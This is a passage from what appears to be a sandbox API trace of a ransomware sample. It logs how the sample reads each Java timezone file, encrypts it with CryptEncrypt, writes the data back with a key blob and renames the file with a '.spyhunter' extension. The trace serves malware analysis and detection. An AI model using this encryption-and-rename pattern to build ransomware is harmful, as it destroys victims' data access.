lpOverlapped=0x0) returned 1 [0168.809] GetProcessHeap () returned 0x2c0000 [0168.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.809] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.810] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce52c*, lpNumberOfBytesWritten=0x25ce4ec*=0x4, lpOverlapped=0x0) returned 1 [0168.810] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4ec*=0x30, lpOverlapped=0x0) returned 1 [0168.810] CloseHandle (hObject=0xb0) returned 1 [0168.810] GetProcessHeap () returned 0x2c0000 [0168.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.810] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4.spyhunter") returned 63 [0168.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4.spyhunter")) returned 1 [0168.811] GetProcessHeap () returned 0x2c0000 [0168.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.811] GetProcessHeap () returned 0x2c0000 [0168.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.811] GetProcessHeap () returned 0x2c0000 [0168.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f281d0 | out: hHeap=0x2c0000) returned 1 [0168.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce530 | out: pbBuffer=0x25ce530) returned 1 [0168.811] GetProcessHeap () returned 0x2c0000 [0168.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce528*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce528*=0x30) returned 1 [0168.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.843] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3") returned 53 [0168.843] StrStrW (lpFirst="GMT+3", lpSrch=".txt") returned 0x0 [0168.843] GetProcessHeap () returned 0x2c0000 [0168.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.843] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce4ec*=0x1b, lpOverlapped=0x0) returned 1 [0168.844] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.844] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce4ec*=0x1b, lpOverlapped=0x0) returned 1 [0168.844] GetProcessHeap () returned 0x2c0000 [0168.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.844] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.844] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce52c*, lpNumberOfBytesWritten=0x25ce4ec*=0x4, lpOverlapped=0x0) returned 1 [0168.844] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4ec*=0x30, lpOverlapped=0x0) returned 1 [0168.844] CloseHandle (hObject=0xa0) returned 1 [0168.845] GetProcessHeap () returned 0x2c0000 [0168.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.845] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3.spyhunter") returned 63 [0168.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3.spyhunter")) returned 1 [0168.845] GetProcessHeap () returned 0x2c0000 [0168.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.845] GetProcessHeap () returned 0x2c0000 [0168.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.845] GetProcessHeap () returned 0x2c0000 [0168.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28118 | out: hHeap=0x2c0000) returned 1 [0168.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce528 | out: pbBuffer=0x25ce528) returned 1 [0168.846] GetProcessHeap () returned 0x2c0000 [0168.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce520*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce520*=0x30) returned 1 [0168.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.854] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT") returned 51 [0168.854] StrStrW (lpFirst="CST6CDT", lpSrch=".txt") returned 0x0 [0168.854] GetProcessHeap () returned 0x2c0000 [0168.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.854] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4e4*=0x4f8, lpOverlapped=0x0) returned 1 [0168.855] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.856] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4f8, lpNumberOfBytesWritten=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4e4*=0x4f8, lpOverlapped=0x0) returned 1 [0168.856] GetProcessHeap () returned 0x2c0000 [0168.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.856] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.856] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce524*, lpNumberOfBytesWritten=0x25ce4e4*=0x4, lpOverlapped=0x0) returned 1 [0168.856] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4e4*=0x30, lpOverlapped=0x0) returned 1 [0168.856] CloseHandle (hObject=0xb0) returned 1 [0168.856] GetProcessHeap () returned 0x2c0000 [0168.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.856] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT.spyhunter") returned 61 [0168.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt.spyhunter")) returned 1 [0168.857] GetProcessHeap () returned 0x2c0000 [0168.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.857] GetProcessHeap () returned 0x2c0000 [0168.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.857] GetProcessHeap () returned 0x2c0000 [0168.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21db0 | out: hHeap=0x2c0000) returned 1 [0168.857] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce528 | out: pbBuffer=0x25ce528) returned 1 [0168.857] GetProcessHeap () returned 0x2c0000 [0168.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.857] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce520*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce520*=0x30) returned 1 [0168.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.858] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth") returned 59 [0168.858] StrStrW (lpFirst="Perth", lpSrch=".txt") returned 0x0 [0168.858] GetProcessHeap () returned 0x2c0000 [0168.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.858] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4e4*=0xcd, lpOverlapped=0x0) returned 1 [0168.859] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.859] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4e4*=0xcd, lpOverlapped=0x0) returned 1 [0168.859] GetProcessHeap () returned 0x2c0000 [0168.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.859] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.859] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce524*, lpNumberOfBytesWritten=0x25ce4e4*=0x4, lpOverlapped=0x0) returned 1 [0168.859] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4e4*=0x30, lpOverlapped=0x0) returned 1 [0168.859] CloseHandle (hObject=0xb0) returned 1 [0168.859] GetProcessHeap () returned 0x2c0000 [0168.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.859] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth.spyhunter") returned 69 [0168.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth.spyhunter")) returned 1 [0168.861] GetProcessHeap () returned 0x2c0000 [0168.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.861] GetProcessHeap () returned 0x2c0000 [0168.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.861] GetProcessHeap () returned 0x2c0000 [0168.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebdc40 | out: hHeap=0x2c0000) returned 1 [0168.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce520 | out: pbBuffer=0x25ce520) returned 1 [0168.861] GetProcessHeap () returned 0x2c0000 [0168.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce518*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce518*=0x30) returned 1 [0168.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.862] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne") returned 63 [0168.863] StrStrW (lpFirst="Melbourne", lpSrch=".txt") returned 0x0 [0168.863] GetProcessHeap () returned 0x2c0000 [0168.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.863] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4dc*=0x4c8, lpOverlapped=0x0) returned 1 [0168.872] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.872] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4dc*=0x4c8, lpOverlapped=0x0) returned 1 [0168.872] GetProcessHeap () returned 0x2c0000 [0168.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.873] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.873] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x25ce51c*, lpNumberOfBytesWritten=0x25ce4dc*=0x4, lpOverlapped=0x0) returned 1 [0168.873] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4dc*=0x30, lpOverlapped=0x0) returned 1 [0168.873] CloseHandle (hObject=0xb0) returned 1 [0168.873] GetProcessHeap () returned 0x2c0000 [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.873] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne.spyhunter") returned 73 [0168.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne.spyhunter")) returned 1 [0168.874] GetProcessHeap () returned 0x2c0000 [0168.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.874] GetProcessHeap () returned 0x2c0000 [0168.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.874] GetProcessHeap () returned 0x2c0000 [0168.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbba0 | out: hHeap=0x2c0000) returned 1 [0168.874] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce520 | out: pbBuffer=0x25ce520) returned 1 [0168.874] GetProcessHeap () returned 0x2c0000 [0168.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.874] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce518*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce518*=0x30) returned 1 [0168.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.898] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe") returned 63 [0168.898] StrStrW (lpFirst="Lord_Howe", lpSrch=".txt") returned 0x0 [0168.898] GetProcessHeap () returned 0x2c0000 [0168.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.898] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4dc*=0x3f4, lpOverlapped=0x0) returned 1 [0168.900] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffc0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.900] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4dc*=0x3f4, lpOverlapped=0x0) returned 1 [0168.900] GetProcessHeap () returned 0x2c0000 [0168.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.900] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.900] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x25ce51c*, lpNumberOfBytesWritten=0x25ce4dc*=0x4, lpOverlapped=0x0) returned 1 [0168.900] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4dc*=0x30, lpOverlapped=0x0) returned 1 [0168.900] CloseHandle (hObject=0xb0) returned 1 [0168.900] GetProcessHeap () returned 0x2c0000 [0168.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.900] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe.spyhunter") returned 73 [0168.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe.spyhunter")) returned 1 [0168.901] GetProcessHeap () returned 0x2c0000 [0168.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.901] GetProcessHeap () returned 0x2c0000 [0168.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.901] GetProcessHeap () returned 0x2c0000 [0168.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbad8 | out: hHeap=0x2c0000) returned 1 [0168.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce518 | out: pbBuffer=0x25ce518) returned 1 [0168.901] GetProcessHeap () returned 0x2c0000 [0168.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce510*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce510*=0x30) returned 1 [0168.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.902] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill") returned 65 [0168.902] StrStrW (lpFirst="Broken_Hill", lpSrch=".txt") returned 0x0 [0168.902] GetProcessHeap () returned 0x2c0000 [0168.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.902] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4d4*=0x4c8, lpOverlapped=0x0) returned 1 [0168.950] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.950] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4d4*=0x4c8, lpOverlapped=0x0) returned 1 [0168.950] GetProcessHeap () returned 0x2c0000 [0168.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.950] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.950] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce514*, lpNumberOfBytesWritten=0x25ce4d4*=0x4, lpOverlapped=0x0) returned 1 [0168.950] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4d4*=0x30, lpOverlapped=0x0) returned 1 [0168.950] CloseHandle (hObject=0xb0) returned 1 [0168.950] GetProcessHeap () returned 0x2c0000 [0168.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.950] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill.spyhunter") returned 75 [0168.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill.spyhunter")) returned 1 [0168.951] GetProcessHeap () returned 0x2c0000 [0168.951] HeapFree (in: 